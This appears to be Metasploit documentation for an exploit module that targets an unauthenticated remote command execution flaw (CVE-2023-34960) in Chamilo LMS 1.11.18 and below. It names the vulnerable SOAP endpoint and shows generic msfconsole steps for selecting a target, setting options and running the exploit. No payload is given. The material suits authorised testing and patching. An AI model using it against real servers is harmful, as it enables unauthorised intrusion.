Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
This module exploits an unauthenticated remote command execution vulnerability
that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
Due to a functionality called Chamilo Rapid to easily convert PowerPoint
slides to courses on Chamilo, it is possible for an unauthenticated remote
attacker to execute arbitrary commands at OS level using a malicious SOAP
request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
msf > use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960
msf exploit(chamilo_unauth_rce_cve_2023_34960) > show targets
...targets...
msf exploit(chamilo_unauth_rce_cve_2023_34960) > set TARGET < target-id >
msf exploit(chamilo_unauth_rce_cve_2023_34960) > show options
...show and set options...
msf exploit(chamilo_unauth_rce_cve_2023_34960) > exploit